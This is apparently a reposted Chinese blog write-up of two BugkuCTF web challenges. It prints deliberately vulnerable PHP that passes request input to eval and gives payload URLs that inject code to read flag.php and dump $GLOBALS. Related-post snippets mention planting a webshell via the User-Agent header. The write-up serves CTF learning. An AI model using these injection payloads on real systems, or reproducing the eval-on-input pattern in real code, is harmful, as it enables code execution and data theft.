BugkuCTF web writeup

最新推荐文章于 2024-07-04 17:01:37 发布
最新推荐文章于 2024-07-04 17:01:37 发布
阅读量181 收藏
点赞数
文章标签: php
原文链接:https://segmentfault.com/a/1190000016750234
版权

本地包含

题目信息

clipboard.png

地址:http://123.206.87.240:8003/

<?php 
    include "flag.php"; 
    $a = @$_REQUEST['hello']; 
    eval( "var_dump($a);"); 
    show_source(__FILE__); 
?>

知识基础

涉及到的几个函数:
1.$_REQUEST: 可以获取以POST方法和GET方法提交的数据,但是速度比较慢

2.eval: 把字符串按照 PHP 代码来计算,该字符串必须是合法的 PHP 代码,且必须以分号结尾。

<?php
eval("echo'hello';echo' world';");
?>
# output
hello world

3.var_dump: 函数用于输出变量的相关信息

# 数字
var_dump(1); > int(1)
# 字符串
var_dump("string"); >  string(6) "string"

解题思路

eval应该是此题的突破口,能够执行php代码。
hello是接受参数的变量,接下来就是构建hello变量,使其能够闭合var_dump,利用print_r输出

首先闭合var_dump: 1)";
第二步构建print_r:print_r(file("./flag.php"));

URL构建结束:
http://123.206.87.240:8003/index.php?hello=1);print_r(file("./flag.php")

构建的URL触发的 eval操作为
eval("var_dump(1);print_r(file("./flag.php")")

成功输出 flag.php 文件内容

clipboard.png

参考资源

1.echo(),print(),print_r()之间的区别?
2.PHP file() 函数

变量1

题目信息

clipboard.png

flag In the variable ! <?php  

error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
    $args = $_GET['args'];
    if(!preg_match("/^\w+$/",$args)){
        die("args error!");
    }
    eval("var_dump($$args);");
}
?>

知识基础

isset: 用于检测变量是否已设置并且非 NULL。
prep_match: 用于执行一个正则表达式匹配。

解题思路

flag In the variable ! 提示 flag 在变量中

根据!preg_match("/^\w+$/",$args)得知,arg只能是任意字母,数字,下划线,汉字的字符组成

eval("var_dump($$args);"); 使$GLOBALS变量被输出即可

clipboard.png

url: http://123.206.87.240:8004/index1.php?args=GLOBALS

参考资源

PHP 变量

weixin_33938733
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BugkuCTF(Web) WriteUp
CallMeSa1tyFish的博客
08-06 6087
Web部分 web2 点开以后发现是满屏的滑稽,按照国际惯例,查看源代码发现flag 文件上传测试 用burp抓包修改文件名后缀为.php 计算器 修改最大长度限制 web基础$_GET 题目如下 $what=$_GET['what']; echo $what; if($what=='flag') echo 'flag{****}'; 直接输入?what=fla...
BugkuCTF【部分web
taozijun的博客
09-27 949
web基础$_POST 这个很简单,hackbar就可以做,但是只能用hackbar做吗? 如果网页原本没有输入框给你输入数据,并在后台设置提交方法为post,那么你就无法主动向一个网站post一个数据(dalao会构造post表单例外)。有什么方法可以简单地向一个网页主动去post一个数据呢? 但....我没找到(因为包不一样所以抓包改包软件也没什么用)。只能说在chrome可以用post...
本地包含
yumengzth的博客
08-01 1745
        进去之后看到如下代码:   &lt;?php      include "flag.php";      $a = @$_REQUEST['hello'];      eval( "var_dump($a);");      show_source(__FILE__);  ?&gt;   $_REQUEST[ ] 默认情况下包含...
Bugku——Web——eval
慎铭的博客
02-02 1060
<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 给出了如上代码,很明显,flag在flag.php文件内。 REQUEST方法既可以接受GET方法,也可以接受POST方法,方便起见,我们选择GET方法。 eval函数 eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是合法的 PHP 代码,且
php函数(三)eval函数对比详解
tutu123456789101112的博客
03-05 873
preg_match(’/^\w*$/’,$a ),对$a的值进行匹配,如果是特殊字符返回error,反之进入eval. var_dump(),结构化的打印变量值. eval(),字符串按照 PHP 代码来计算. &amp;amp;lt;?php include &amp;quot;flag.php&amp;quot;; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )) { die...
ctfshow 文件包含(web78-web81)
m0_62274649的博客
12-16 230
这个题可以用日志包含来做,apache的日志一般是/var/log/apache/access.log。nginx的日志在/var/log/nginx/access.logstep1:把一句话木马加到U-A头里:
SunshineCTF - Evaluation
安久哲的博客
09-28 1293
做一题 学一题 题目里不懂的 列入学习清单 再一一搜 解决不同的问题 打开题目 php审计 <?php include "flag.php"; error_reporting(0); show_source(__FILE__); $a = @$_REQUEST['hello']; eval("var_dump($a);"); ?> 包含了一个flag.php ...
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
bugku杂项题writeup
11-22
bugku杂项题writeup
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。目录 ...
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
php简单代码审计
xianyu9w的博客
04-18 554
题目来源 bugku 题目: <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> eval能够执行php代码 $_REQUEST: 能获取get/post提交的数据 eval: 把字符串按照 PHP 代码来计算,该字符串必须是合法的 PHP 代码,且必须以分号结尾。 个人猜测应该类似于sql注入 先.
CTF/CTF练习平台-本地包含【eval函数闭合及代码段的理解】
热门推荐
Sp4rkW的博客
08-21 4万+
原题内容: 地址:http://120.24.86.145:8003/ 怎么说呢,难其实也不难,还是基本知识点掌握不足吧,写个wp记录下自己学习到的知识点 &lt;?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(_...
关于PHP代码审计的一些题目
Animation77的博客
09-07 1854
题目一: <?php ////phpinfo(); error_reporting(0); show_source(__file__); preg_replace($_GET["a"], $_GET["b"], $_GET["c"]); ?> 解题思路:先看preg_replace函数定义 这里用到了一个小技巧,用到 /e(有些php版本不支持,我这里是可以的), 这...
i春秋 百度杯”CTF比赛(二月场) Misc&&web题解 By Assassin
Assassin
03-16 2万+
学习web,搞起来! 百度杯”CTF比赛(二月场)训练赛传送门爆破-1打开题目我们直接就看到源码,加上注释如下<?php include "flag.php"; //包含flag.php这个文件 $a = @$_REQUEST['hello']; //$a这个变量请求变量hello的值 if(!preg_match('/^\w*$/',$a )){ //正则
ctf日常学习记录(web
qq_27396789的博客
01-11 6294
爆破1题目提示:flag就在某六位变量中。点开题目链接显示代码:<?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);"); show_source(__FILE__); ?>关键是这个东西var_dump($$
CTF平台题库writeup(二)--BugKuCTF-WEB(部分)
渗透、攻防、CTF、编程
06-26 4156
web2 flag在源码的注释里 计算器 改一下text文本框的最大输入位数>1即可 web基础$_GET GET方式传参即可 web基础$_POST post方式传参即可 矛盾 $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } 这题要求传参num不能是数字,而且num=1,一开始没有什么思路,认为是弱类型的绕过,传了true进去,发现无效,问
实战某大型连锁企业域渗透
最新发布
Ms08067安全实验室
07-04 1009
点击星标,即时接收最新推文本文选自《内网安全攻防:红队之路》扫描二维码五折购书实战域渗透测试流程对黑客来说,拿下域控制器是终极目标。然而攻击者空间是如何通过采取信息收集、权限提升、横向移动等一系列手段,从而一步步拿下域控制器的呢?本次将从一张拓扑图开始,和大家一起梳理域的相关知识,并串联内网的各类攻击技术。实验环境概述 下图是一张某公司(虚构名:北京test公司)的网络拓扑示意图。该公司员工...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值